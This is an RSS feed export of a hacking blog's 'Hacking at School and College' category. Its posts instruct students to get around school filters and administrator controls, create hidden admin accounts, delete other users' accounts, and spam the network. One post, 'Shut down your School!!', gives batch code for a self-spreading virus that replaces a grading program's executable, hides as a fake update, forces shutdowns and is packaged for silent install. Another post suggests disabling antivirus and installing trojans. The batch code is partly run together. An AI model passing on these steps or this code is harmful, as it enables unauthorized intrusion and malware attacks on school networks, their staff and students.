<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Hacking at School and College</title>
	<atom:link href="http://www.hungry-hackers.com/category/hacking-at-school-and-college/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Follow me on twitter..</title>
		<link>http://www.hungry-hackers.com/2009/02/follow-me-on-twitter.html</link>
		<comments>http://www.hungry-hackers.com/2009/02/follow-me-on-twitter.html#comments</comments>
		<pubDate>Sun, 08 Feb 2009 19:29:08 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Blog Update]]></category>
		<category><![CDATA[Hacking at School and College]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=524</guid>
		<description><![CDATA[It’s been too long in coming, but I’ve finally made the leap to Twitter. You can follow me here:

http://www.twitter.com/hackingtruths

I promise to keep you updated with the on goings in the Hacking Truths Blog and keep the topics and conversation similar. Although I’m hoping it will be a bit more lively and informal.

Finally I have decided to surprise you with a special gift. The first 500 followers will be awarded access to  cool Hungry Hacker's Resource.

See you there...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">It’s been too long in coming, but I’ve finally made the leap to Twitter. You can follow me here:</p>
<p style="text-align: justify;">http://www.twitter.com/hackingtruths</p>
<p style="text-align: justify;">I promise to keep you updated with the on goings in the Hacking Truths Blog and keep the topics and conversation similar. Although I’m hoping it will be a bit more lively and informal.</p>
<p style="text-align: justify;">Finally I have decided to surprise you with a special gift. The first 500 followers will be awarded access to  cool Hungry Hacker&#8217;s Resource.</p>
<p style="text-align: justify;">See you there&#8230;</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=524&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/02/follow-me-on-twitter.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to Set up your own Proxy Server</title>
		<link>http://www.hungry-hackers.com/2008/07/how-to-setup-your-own-proxy-server.html</link>
		<comments>http://www.hungry-hackers.com/2008/07/how-to-setup-your-own-proxy-server.html#comments</comments>
		<pubDate>Sat, 26 Jul 2008 04:26:46 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Hacking at School and College]]></category>
		<category><![CDATA[Proxy]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[College]]></category>
		<category><![CDATA[Do it yourself]]></category>
		<category><![CDATA[School]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Setup]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=326</guid>
		<description><![CDATA[Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.]]></description>
			<content:encoded><![CDATA[<p>Lot´s of people complain that Web Proxys are not working at their Works / Schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free web hosting service that supports either php or cgi or b) your own website that is being hosted by a web hosting company.</p>
<p>Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of <a href="http://freshmeat.net/projects/phpproxy/" target="_blank">phpproxy</a> or <a href="http://www.jmarshall.com/tools/cgiproxy/" target="_blank">cgiproxy</a> depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to <a title="Find a Web Host" href="http://www.webhostingsearch.com/advanced-search.php" target="_blank">find a web host</a> that supports one of the two languages, a good site that I found while searching for those terms might be <a href="http://www.freewebspace.net/" target="_blank">freewebspace.net</a></p>
<p><strong>1. phpproxy</strong></p>
<p>Download <a href="http://idea.hosting.lv/a/phpproxy/" target="_blank">phpproxy</a> and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.</p>
<p>You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess</p>
<p>The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.<br />
[eminimall]<br />
<strong>2. cgiproxy</strong></p>
<p>Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.</p>
<p>First, download the <a href="http://www.jmarshall.com/tools/cgiproxy/releases/cgiproxy.2.0.1.tar.gz" target="_blank">source</a> and unpack it to a local directory.</p>
<p>Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.</p>
<p>After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like <a href="http://www.whatismyip.com/" target="_blank">whatismyip.com</a> as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)</p>
<p><strong>3. What is being blocked </strong>?</p>
<p>a) If you can access the proxy from the client they only block domains / ips.<br />
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=326&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/07/how-to-setup-your-own-proxy-server.html/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Breaking the Restrictions of the Administrator</title>
		<link>http://www.hungry-hackers.com/2008/06/breaking-the-restrictions-of-the-administrator.html</link>
		<comments>http://www.hungry-hackers.com/2008/06/breaking-the-restrictions-of-the-administrator.html#comments</comments>
		<pubDate>Sun, 29 Jun 2008 16:53:14 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=311</guid>
		<description><![CDATA[Hello Friends many of you have come with this problem of hacking the Administrator in Windows XP. So her is the Solution to your problem. This works on Win 2000 &#38; Win XP.
This can be used to gain access to the website you want to for free, and how you can gain access to &#8216;control panel&#8217;, and the various other tools of Windows that may have been blocked from your grasp like &#8216;regedit&#8217; by the administrator. IT can be used in schools &#38; colleges..
When u are at the log on ...]]></description>
			<content:encoded><![CDATA[<p>Hello Friends many of you have come with this problem of hacking the Administrator in Windows XP. So her is the Solution to your problem. This works on Win 2000 &amp; Win XP.</p>
<p>This can be used to gain access to the website you want to for free, and how you can gain access to &#8216;control panel&#8217;, and the various other tools of Windows that may have been blocked from your grasp like &#8216;regedit&#8217; by the administrator. IT can be used in schools &amp; colleges..</p>
<p>When u are at the log on screen, type in your username and password. Now When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.</p>
<p>Now you can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, &amp; all the other features which had been blocked BUT there will be no network access. But that&#8217;s cool because now we can access &#8216;Internet options&#8217;,<br />
click in the &#8216;connections&#8217; tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.</p>
<p>Its only an &#8216;Unplugging technique&#8217; to gain access to a comp. locked by the administrator.</p>
<p>Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u&#8217;re will..</p>
<p><span style="text-align: justify;"><strong>XP HOME ADVANCED FILE PERMISSIONS.</strong>!!</span></p>
<p style="text-align: justify;">Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read &amp; write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don&#8217;t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt &#8211; Start&gt;All Programs&gt;Accessories&gt;Command Prompt. Now type &#8220;cacls&#8221; in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type &#8220;cacls /?&#8221; for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember &#8211; this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse&#8217;s mouth &#8211; the Microsoft Resource Center. You will find a lot of very useful web-based extra&#8217;s here, most of them left unknowing to the general public &#8211; such as, &#8220;Online Crash Analysis&#8221; &#8211; a site that looks like Windows Update but you can upload your crash &#8220;dump logs&#8221; (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).</p>
<p>Now lets c how to open restricted site on college servers<br />
Hungry Hacker recommends : <a class="external" rel="nofollow" href="http://unblockall.net/" target="_blank">http://unblockall.net/</a></p>
<ul style="text-align: justify;">
<li>Bypass any filters from work or school and access your favorite community and entertainment sites</li>
<li>Enjoy a fast and reliable connection. Our dedicated machines have 1Gbps connection and 2 quad processors</li>
<li>Chat with your friends from work</li>
<li>Watch videos on Youtube</li>
<li>Login into Myspace, Facebook and all the popular community sites without losing the proxy</li>
<li>No traffic redirection</li>
<li>No PopUp and Annoying Ads!</li>
</ul>
<p style="text-align: justify;">To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This will automatically lead you to the destination page. With our service you are guaranteed to be able to login and operatate normally.</p>
<p>PLEASE DROP IN YOUR COMMENTS BELOW</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=311&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/06/breaking-the-restrictions-of-the-administrator.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>School Network Hacking</title>
		<link>http://www.hungry-hackers.com/2008/06/school-network-hacking.html</link>
		<comments>http://www.hungry-hackers.com/2008/06/school-network-hacking.html#comments</comments>
		<pubDate>Mon, 23 Jun 2008 09:34:02 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Hacking at School and College]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[School]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=305</guid>
		<description><![CDATA[How to become Admin on your school Network. This way works for most schools.
Howdy Everyone
This tutorial is for those newbies out there, wanting to &#8220;hack&#8221; their school.
Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask ...]]></description>
			<content:encoded><![CDATA[<p>How to become Admin on your school Network. This way works for most schools.</p>
<p>Howdy Everyone</p>
<p>This tutorial is for those newbies out there, wanting to &#8220;hack&#8221; their school.</p>
<p>Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.</p>
<p>Firstly get a feel for the layout of the network.. you can do this quickly by:</p>
<p>Start &gt; Programs(Right Click) &gt; Explore</p>
<p>this will give you a map of the network, and you&#8217;ll probably be able to edit and run files this way, but with DOS theres more options&#8230;</p>
<p>The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.</p>
<p>So to get around this you can do two things:</p>
<p>1) input this into the IE address &#8220;C:windowssystem32cmd.exe&#8221;</p>
<p>however this is very likely to be disabled.</p>
<p>2) Creating a Bat file to open Command Prompt.</p>
<p>You can do this by, opening IE &gt; view &gt; source.</p>
<p>once you have notepad open, where gonna make a .BAT file.</p>
<p>we want the BAT file to open up command prompt, so we type:</p>
<p>&#8220;CMD&#8221; without the &#8220;&#8221; press ENTER then save it as file.BAT.</p>
<p>Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.</p>
<p>So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.</p>
<p>Once we have it open now comes the good bit&#8230;.</p>
<p>Before doing this, make sure you know a good lot of DOS commands.</p>
<p>Heres a great list www.computerhope.com/msdos</p>
<p>These are a few that you might like to try:</p>
<p>Net send * &#8220;Hungry Hacker is cool&#8221;</p>
<p>Shutdown -s -f -m &amp;*92;NAME &#8211; rarely works</p>
<p>These will only work if you have the privilages to use them.</p>
<p>After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.</p>
<p>There is also a good chance that the network will have RAT&#8217;s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks&#8230; a bit like a friendly trojan.</p>
<p>This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, &#8211; Now you have control over every computer!!</p>
<p>You could use the RAT to use the admins machine, here possibilites are endless!</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=305&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/06/school-network-hacking.html/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Shut down your School!!</title>
		<link>http://www.hungry-hackers.com/2008/03/shut-down-your-school.html</link>
		<comments>http://www.hungry-hackers.com/2008/03/shut-down-your-school.html#comments</comments>
		<pubDate>Tue, 18 Mar 2008 13:02:02 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>
		<category><![CDATA[Hacking Computer]]></category>
		<category><![CDATA[Windows Hacking]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/2008/03/shut-down-your-school.html</guid>
		<description><![CDATA[ This article is for only educational purpose, i am not responsible for any misuse of this article.

By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
&#8220;You have been hacked!&#8221;
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong> This article is for only educational purpose, i am not responsible for any misuse of this article.<br />
</strong><br />
By using the following command you can shutdown your school or college by using only Note pad.</p>
<p style="text-align: justify;">This is the main command that will be launched upon startup.<br />
Type this in Notepad.<br />
@echo offshutdown.exe -s -t 10 -c<br />
&#8220;You have been hacked!&#8221;<br />
Save this as shutdown.bat, making sure you choose all files as the filetype.</p>
<p style="text-align: justify;">Step 2<br />
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don&#8217;t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.<br />
<a class="external" rel="nofollow" href="http://www.mutantsrus.com/Update.reg" target="_blank">http://www.mutantsrus.com/Update.reg</a></p>
<p style="text-align: justify;">Step 3<br />
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.</p>
<p style="text-align: justify;">Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti</p>
<p style="text-align: justify;">Here is the code:</p>
<p style="text-align: justify;">@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit</p>
<p style="text-align: justify;">Save this as global.bat</p>
<p style="text-align: center;"><!-- Begin: AdBrite --><br />
<script type="text/javascript">
   var AdBrite_Title_Color = 'FF8844';
   var AdBrite_Text_Color = '000000';
   var AdBrite_Background_Color = 'FFFFFF';
   var AdBrite_Border_Color = 'FFFFFF';
   var AdBrite_URL_Color = '7F7F7F';
</script><br />
<span style="white-space:nowrap;"><script src="http://ads.adbrite.com/mb/text_group.php?sid=507864&#038;zs=3436385f3630" type="text/javascript"></script></span><br />
<!-- End: AdBrite --></p>
<p style="text-align: justify;">
<p style="text-align: justify;">Step 4<br />
They grow up so fast &#8212; real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user&#8217;s hard drive and remain there.</p>
<p style="text-align: justify;">@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit<br />
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.</p>
<p style="text-align: justify;">Step 5<br />
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.<br />
@echo off<br />
shutdown -acd C:\WINDOWSdel shutdown.bat</p>
<p style="text-align: justify;">Save as cure.bat</p>
<p style="text-align: justify;">@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS<br />
Now download this file: <a class="external" rel="nofollow" href="http://www.mutantsrus.com/cure.exe" target="_blank">http://www.mutantsrus.com/cure.exe</a></p>
<p style="text-align: justify;">Step 6<br />
The SetupNo it&#8217;s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: <a class="external" rel="nofollow" href="http://www.rarlab.com/" target="_blank">http://www.rarlab.com</a>. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to &#8220;tools&#8221;, then select &#8220;convert archive to SFX&#8221;. Click &#8220;Advanced SFX Options&#8221; In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)<br />
<!-- google_ad_section_end --></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=279&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/03/shut-down-your-school.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Adding/Modifying User Accounts</title>
		<link>http://www.hungry-hackers.com/2007/09/addingmodifying-user-accounts.html</link>
		<comments>http://www.hungry-hackers.com/2007/09/addingmodifying-user-accounts.html#comments</comments>
		<pubDate>Wed, 30 Nov -0001 00:00:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Accounts]]></category>
		<category><![CDATA[Modifying]]></category>
		<category><![CDATA[User]]></category>

		<guid isPermaLink="false">http://hungry-hackers.com/?p=43</guid>
		<description><![CDATA[Now that you have a command prompt, you can add a new user (ie yourself) like so
C:&#62;net user username /ADD
where username is the name of your new account. And remember, try and make it look inconspicuous, then they&#8217;ll just think its a student who really is at school, when really, the person doesn&#8217;t EXIST! IF you wanna have a password, use this instead:
C:&#62;net user username password /ADD
where password is the password you want to have. So for instance the above would create an account called &#8216;username&#8217;, with the password being ...]]></description>
			<content:encoded><![CDATA[<p>Now that you have a command prompt, you can add a new user (ie yourself) like so</p>
<p>C:&gt;net user username /ADD</p>
<p>where username is the name of your new account. And remember, try and make it look inconspicuous, then they&#8217;ll just think its a student who really is at school, when really, the person doesn&#8217;t EXIST! IF you wanna have a password, use this instead:</p>
<p>C:&gt;net user username password /ADD</p>
<p>where password is the password you want to have. So for instance the above would create an account called &#8216;username&#8217;, with the password being &#8216;password&#8217;. The below would have a username of &#8216;JohnSmith&#8217; and a password of &#8216;fruity&#8217;</p>
<p>C:&gt;net user JohnSmith fruity /ADD</p>
<p>Right then, now that we can create accounts, let&#8217;s delete them:)</p>
<p>C:&gt;net user JohnSmith /DELETE</p>
<p>This will delete poor liddle JohnSmith&#8217;s account. Awww. Do it to you enemies:P no only joking becuase they could have important work&#8230; well okay only if you REALLY hate them:)</p>
<p>Let&#8217;s give you admin priveleges:)</p>
<p>C:&gt;net localgroup administrator JohnSmith /ADD</p>
<p>This will make JohnSmith an admin. Remember that some schools may not call their admins &#8216;adminstrator&#8217; and so you need to find out the name of the local group they belong to.</p>
<p>You can list all the localgroups by typing</p>
<p>C:&gt;net localgroup</p>
<p>Running .exe files you can&#8217;t usually run</p>
<p>In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.</p>
<p>Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don&#8217;t go round screwing up your school servers, they are providing them free to you to help your learning.</p>
<p>I will add more as I learn more and remember stuff (I think I&#8217;ve left some stuff out &#8211; this article could get very long&#8230;)</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=43&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2007/09/addingmodifying-user-accounts.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Sending messages out over the network</title>
		<link>http://www.hungry-hackers.com/2007/09/sending-messages-out-over-the-network.html</link>
		<comments>http://www.hungry-hackers.com/2007/09/sending-messages-out-over-the-network.html#comments</comments>
		<pubDate>Mon, 03 Sep 2007 06:20:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>

		<guid isPermaLink="false">http://hungry-hackers.com/?p=42</guid>
		<description><![CDATA[Okay, here&#8217;s how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send  * &#8220;The server is h4x0r3d&#8221;
*Note:  may not be necessary, depending on how many your school has access too. If it&#8217;s just one, you can leave it out*
Where  is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. ...]]></description>
			<content:encoded><![CDATA[<p>Okay, here&#8217;s how to send crazy messages to everyone in your school on a computer. In your command prompt, type</p>
<p>Net Send  * &#8220;The server is h4x0r3d&#8221;</p>
<p>*Note:  may not be necessary, depending on how many your school has access too. If it&#8217;s just one, you can leave it out*</p>
<p>Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use</p>
<p>Net Send Varndean * &#8220;The server is h4x0r3d&#8221;</p>
<p>The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people&#8217;s accounts, for example</p>
<p>NetSend Varndean dan,jimmy,admin &#8220;The server is h4x0r3d&#8221;</p>
<p>use commas to divide the names and NO SPACES between them.</domain></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=42&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2007/09/sending-messages-out-over-the-network.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>By passing that pesky web filtering</title>
		<link>http://www.hungry-hackers.com/2007/09/by-passing-that-pesky-web-filtering.html</link>
		<comments>http://www.hungry-hackers.com/2007/09/by-passing-that-pesky-web-filtering.html#comments</comments>
		<pubDate>Mon, 03 Sep 2007 06:18:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>

		<guid isPermaLink="false">http://hungry-hackers.com/?p=41</guid>
		<description><![CDATA[Well, now you&#8217;ve got a command prompt, it&#8217;s time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I&#8217;m going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.
in your command prompt, type
ping hackthissite.org
or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, ...]]></description>
			<content:encoded><![CDATA[<p><b>Well, now you&#8217;ve got a command prompt, it&#8217;s time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I&#8217;m going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.</p>
<p>in your command prompt, type</p>
<p>ping hackthissite.org</p>
<p>or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you&#8217;ll be able to access the page!</p>
<p>For example: http://197.57.189.10 etc.</p>
<p>Now, I&#8217;ve noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:</p>
<p>1) Using a translator, like Altavista&#8217;s Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won&#8217;t translate the page, since it&#8217;s already in English.</p>
<p>2) When you search up the site on Google, there will be a link saying &#8216;Cache&#8217;. Click that and you should be on.</p>
<p>3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart&#8217;s content:)<br /></b></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=41&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2007/09/by-passing-that-pesky-web-filtering.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to get it all moving</title>
		<link>http://www.hungry-hackers.com/2007/09/how-to-get-it-all-moving.html</link>
		<comments>http://www.hungry-hackers.com/2007/09/how-to-get-it-all-moving.html#comments</comments>
		<pubDate>Mon, 03 Sep 2007 06:15:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>

		<guid isPermaLink="false">http://hungry-hackers.com/?p=40</guid>
		<description><![CDATA[An MS-DOS prompt is the best way to do stuff, because most admins don&#8217;t think its possible to get them and, if they do, they just can&#8217;t do anything much about it.
First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write
command.com
and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end ...]]></description>
			<content:encoded><![CDATA[<p><b>An MS-DOS prompt is the best way to do stuff, because most admins don&#8217;t think its possible to get them and, if they do, they just can&#8217;t do anything much about it.</p>
<p>First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write</p>
<p>command.com</p>
<p>and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU&#8217;VE FINISHED!!! if the admins see it, they will kill you;)</b></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=40&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2007/09/how-to-get-it-all-moving.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking at school</title>
		<link>http://www.hungry-hackers.com/2007/09/hacking-at-school.html</link>
		<comments>http://www.hungry-hackers.com/2007/09/hacking-at-school.html#comments</comments>
		<pubDate>Mon, 03 Sep 2007 06:05:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking at School and College]]></category>

		<guid isPermaLink="false">http://hungry-hackers.com/?p=39</guid>
		<description><![CDATA[This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.
There are problems with school servers, and they mostly come back to the basic architecture of the system &#8211; so the admins are unlikely to do anything about it! In this article I will discuss how to ...]]></description>
			<content:encoded><![CDATA[<p><b>This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.</p>
